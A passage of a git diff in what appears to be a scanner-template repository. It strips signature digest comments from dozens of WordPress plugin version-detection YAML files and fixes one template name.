a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100de43accfc7289840d303816f4f0c7a8f71b85356f07479cacd23b32bc8f6f5e7022100fc4d6b5222e346ee86ff2fd77f3a30ce676c3bd850e16f17888f93a026fa61c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 87acaa7910..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022013d79193ece3c070a35a1e3255a08841870f696717da1688c98d4f4e25cc3e0c022100caa2c0df1c99a056fedc91908c8dd74d39e2f93f18a008b41e2d34a2953d2558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 7e5f0a828f..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bd2d320ec0d86e1d53a7c69cdafff5f206aefdeed121cf864ac1eec968ec9d53022100bee3a34523590fff2c086af5f79082a05a0da63f357beb93e282de39e9137e0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 4a04aedfc9..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220261c67c0677a69db97127be7ca9fd49343a150e92168106d2404d094d5b8c514022100c88c93c5be623a8fe9ba25a29c6fd98b7673ee73bedbc9a18bd1f88887091a3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index c9c4828fb8..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210081a78f389996f845611116868cd9cddf56af3fc87fde9823df99abee90e3c1ce0221009377e3741ac1256a51b672df123cc5467f5b2be23f2aea6c4156dbda961a9f0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index d178038411..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202f3a9230c154cd277da82c02e72a9da4a8dccc22f11acacedea83279fd1755d7022100fe1cc055be3e13ee3e6c9c8cf46e584cfcb1c151d1d8578488b76aae76076257:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 24e9c23937..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f16a9adf5a06cb498fb365b487a6acb5aa9ed5e8ee7960a4af629ae6d68a608f02201b1989d45857ee1de1c14dd3d33c5f689340874440b3ab5dd55bb3196ade3084:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 9641f2cf3b..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022020a2f0b9a7e7e0c18f9f49eb80b0f0d9dc9f3918a2e8b64076f42a96f829934402210085f26929c1944a5b942506ad59d2028171787095e5e95d0c7599da43643bb848:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 2c6e3327df..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100916cadaba2ceac8fabcc182d31c8330c04ec374be98883a7744b810357e212b1022063d9af6544ae947046f7c26927dc18a42dc9d61021b085c3cdae76e07496f69d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 443df2f89f..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022026e7858d6fa8770c7677abdfef5ac41a0ded3aafad18bf9c3bfa1a4d2d0944a1022100f63309452a35fd9bf24edef9c6e3faf7695b3eceaa6a635e0e4385caffad3d3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index a5b55aa942..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c9decc1bf230c97329d43542f2573866eb92f42c38df38677bcd77fcdb3191540221008e0fadbc0dbbb0e66621b86018154f3cf49f3413e6e64ee5c7551d1bc634c7af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 91f3246a7a..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201139b26146e69444fff4fb38f506ff06be439388834bcc51f20fcf64a18183a30220439a8e80e511372773c4c07ff9bdd35de0dd1f0c04c1f712981e599ae34ff9c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index b47131e477..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204bd054e30dd0e7255682dc97834640967198ddf039bbe5cfe4c0e0263bbc33b802204cc9eba8f92a1020a3bc8baa6ff0f619e1155f29e7c5db2ecea3530d29539012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index aad8b5b5f4..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a4fca3680e7e3a60315ed52fa42f44da14b270b80e7689d62ddbb611120bedee02210094d14104618a17e95ebd8f9f16c9cbe8507be44eb8b2bb030e3f038e317df0a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a4a58437b9..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022021bb1ed2b98330278a1db8e0428de43969270258439f63be8e9b11c0a9cb832f02202e535ae45d971123633a1a8f777975981cfaf2f20307ede5e4073ca5024bba72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 699eb43cc9..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220488e2e9a821c197bffc150358927d0ff580823387403bd93f06208d41083e50502201f39ccacf2d7b9f3570860e65dd70552a0b5ef5bc3741abf1e2be4fa2a66eabd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index e0f968dbe0..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022017bb9bccf7ab72fad6693d7a991456188192e2ee8ddd00d5a45c0091df68900902204e6af33aa338ae39905c20c554e711e9928b2ea420eb756e5fadbf6109249058:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 49445adaac..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203e568080ae859331a241d5707255fd9f3c91574b7b81238e85993dfef445936c022075292c025ea1b2492d06f7331008e9927e2a79f9c50b2c9965080caa5023c287:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index f4f57be1a3..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022020543a53c72f5880a540fc832516032f98404c2ca74c807c5d7686d881bfc068022100fbd84b4b27bb04814b079e1f05f86d4a67e3f8761167aade993bbb7ca07c90f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index da6ae9faa3..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203a497b2e2174453bfa7e98ddb7bfcd69f34a7b4e50b8c8a17d0be7ac7b2290a10220216a1c7bd29f28dab14bc5cdf5cdcd1f859a7e3f42a8cce8d7b4fcd77287959f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index f37eaaf14d..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022049f81360fa8b6e30f5b3c7e4a05a8eb7dbb8379d15f4fab2d88332a24342ceed022100c084637a8c567af7b19f559a6520d589eef4c0b64cdb4a7432ea67e564a3a547:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1dccee59d3..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a81a53b2cef431f752b830033be70142f88f7cdf17c3f9e9ea4eb4b0ea43a5da02205c7b27a4f0c51985842ef0fce582a32208b1874b0d6aa960332a544dc5d7c399:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b6181aa88f..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f58819c6b7178a5b8da9fd7b04fbc0ce4e3d5e44373aa5053f812ab68cba5386022100a9b3e45eca9ad304fbfd7ed84347afde20b95ca0385ce07b02fb2f7ea507beff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index f39789278f..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c0a783ee86f0be25d4aa179e60c7cc3f82d358f86af092bddd86ce876b4ce31d022100c9a88442be0a1c518dc2cfec462ca41c5ba15facbeabf14d82bea65f763d0966:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index e76b57e3cf..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f07a21b9c4bc8dda7aca7603c864acc7cc620883f606efe856b7ba298c21134e02205c6d054894100b04c103c3358a0d0f49cdf9b214695f05d2d2efce78842360c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index b8b8cfbb15..48e3bd3fca 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -1,7 +1,7 @@ id: wordpress-ml-slider info: - name: Slider, Gallery, and Carousel by MetaSlider – Responsive WordPress Image Slideshows Detection + name: Slider, Gallery, and Carousel by MetaSlider – Responsive WordPress Image Sliders Detection author: ricardomaia severity: info reference: @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c3f884ef83103643dd31fac505bb5d2758ce93c149f6c779cde611c6e0b17ebf02201af78e46213bc4b314ff8619d85aa13584a1a27c4e2e26515f1ea18336212051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 09c6aa96c9..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c9ff72b81c3afbb2de29f4b49572be3382df5b61817af86c9336228e9f539072022022a59d6f3d7bf5791870cbd16daeb1d12268dc32394b44200a97b4f3ea9d6a64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index b0c80e19d0..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e31c0947e4eef2630c6a8d3cad7d20923ce67d19b462f1a5830a6d9b574be43502206dfa683c1b5c7e3ff13e81b49a426eab8a35f97de696c26641948813b779abc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 3cf64da98b..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e0fa7e1c707328e5f2cd2663efdcd52efac8b9496fd94e42efae46b28781d090022100beb12acd075cedd9b3a25db7481bb76b0473d6cc224fe6fa9ddd8bf81c50cc01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 382159b19b..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022009bed3548dafb9ce92ec55a6e3bff28e76aafc6710bc58e9d5ffa28236f47c150220687a2f02b78920e96144bfbc2b0eeaa63dae158fa261194b1cd0ff52205ad315:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index ac5b5ab70c..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c7ec8b421228f82fcecf616289b74a76e32631e6252f6a8e3751e39ad475ffba02201d01e9bef0d4b3d2d81778186c89024d2a6f5ba7c6d7db11bc4185e34db01ee9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 82a144eba6..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009c09b450bc72ccdb8ca35dc75188602d2dcbfbd9709b6ad20104d451945b320d02210091f4091cae2bc13144d8f54ecc44101901d36d31b089dc129db4d743753fd0de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 844f637b44..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009906db1201174085cfe588d8b25e14754de2519a1719f91324e4b3d48ff344880221008b12be7193e7d7ae0b5bd578b79258c7eb358a39adf7c07d3f68aa32770d3794:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 4bb5918220..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220229ad1a430f18a2613afae1a418e6b3d8ebdcfc006c85e027765d0e3eddffbdd022100c0cab0195e0b31d511a50ec7f1ce386d281fa3fa30da9050fab7e037a701dd45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 288166a9a0..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100af88c828d03f964a437e682d601da0dce193883686c7b11a6163a2193941c1320221009f8ebe8ca9527d685cb6e79391d288f0499c4f6d2e2199a823dc749351c98ab4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index fdd2094c57..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220330a06b339661cbb2fcbf21ecb3d1542422250b681b2a44b253534a8d50295b8022069a22fd1111fbaf46bea99c88ef2994ded9dac26e7780479684890cc30d122e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 8741ad7ed6..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203e580ff9b1da5dff9865cd26c3c18c3512cd7d11f31fbf2c8a466cb80d6f4215022024a26da1bb55145ab16d5449a097add134a8c1a505074b706b0de9850a5466ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 0e3824c755..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e06edea40e98ef7061a9b637bcfa7e5cc40a07675e3d74d6c2b062a030122a9502203ca8cf63db1021ea1ad11ccd6c1ba9b90bfb94d07b8c8e0f5369cea9f36c9720:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index c57f74ed24..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fb2dfe074c6faaba14cefec61bfe5b031abc9236170cfce03ae39d5d02bf1f85022100b73c62fcba3f0a02097607646113d9a0bba0a01708f53ca7677fe5206ee551bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index a7546af792..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022006586853b3f28f59b84cca482b27e95a93104393378d534ff446ca3eab22026402204700e5f5935a4708bcff3e9972eba950c410efa06ea18d6e8dc8ec4da0590a06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index a758a7b9b7..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200bc4711057301ad5e3489bc6040cb6a81dda5f62915d496246c91fd42384930702205702118d2915161fd3238c5eaab9214550133c720d927f4f16b5d563dea5ffe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 7727009724..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022045cb152d4f2c5a139e764b3214bcf2cd8ea2dfc18af43a9ec21795b3ab8eb2e5022100800d9e0e2690106347ff19fd9597407ed2ff3347349d00fd04c0ca4d19482f67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 791489f222..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022005cc9151e736fdc4d8d799e4549fc90d41550f171c0397593605a43290b3dffe022100c6e9fcee8b18f66fc53a8e31fcc6987483bb27d2b0b7bac301cb68734a2014ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index f6e3d96d68..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201240286dd418ed6fdc7bb61cab6d92ff63257fc97af5577c2b5ae77cb3c7ec6e022100b6126a9432ad483e8bd2b327e57fa0ab8caba19c1a6faaf641e3dbb7d9acef6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 0abe1885cc..4f99876557 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ce0edbd22a4522d395f4988c4137c18678a72bc6c080adb8f9e4e2c97eb64b6002210098ade1dfc694a99a9d4956a861ec514f05eda42cc38cac3ff069c7dc5d137c40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index c3cd142e98..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eb739e3f61d0efc446cc14657bc109ba85a1ddff850ea3a905a67c7230944914022100fde55388157dbc67ce2128fc49000674db8fc66df96d467fdcfae91444f3ee8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 90011f960f..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220270ede3fc209d28a18920fb4ac9e5b19131d0c7c865cdc01576ee8bb96de0339022008114b4bd9d83897c73ec10e1a4f7f41b5ef3439c653b613a97c07686a61016a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 84a856a099..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ 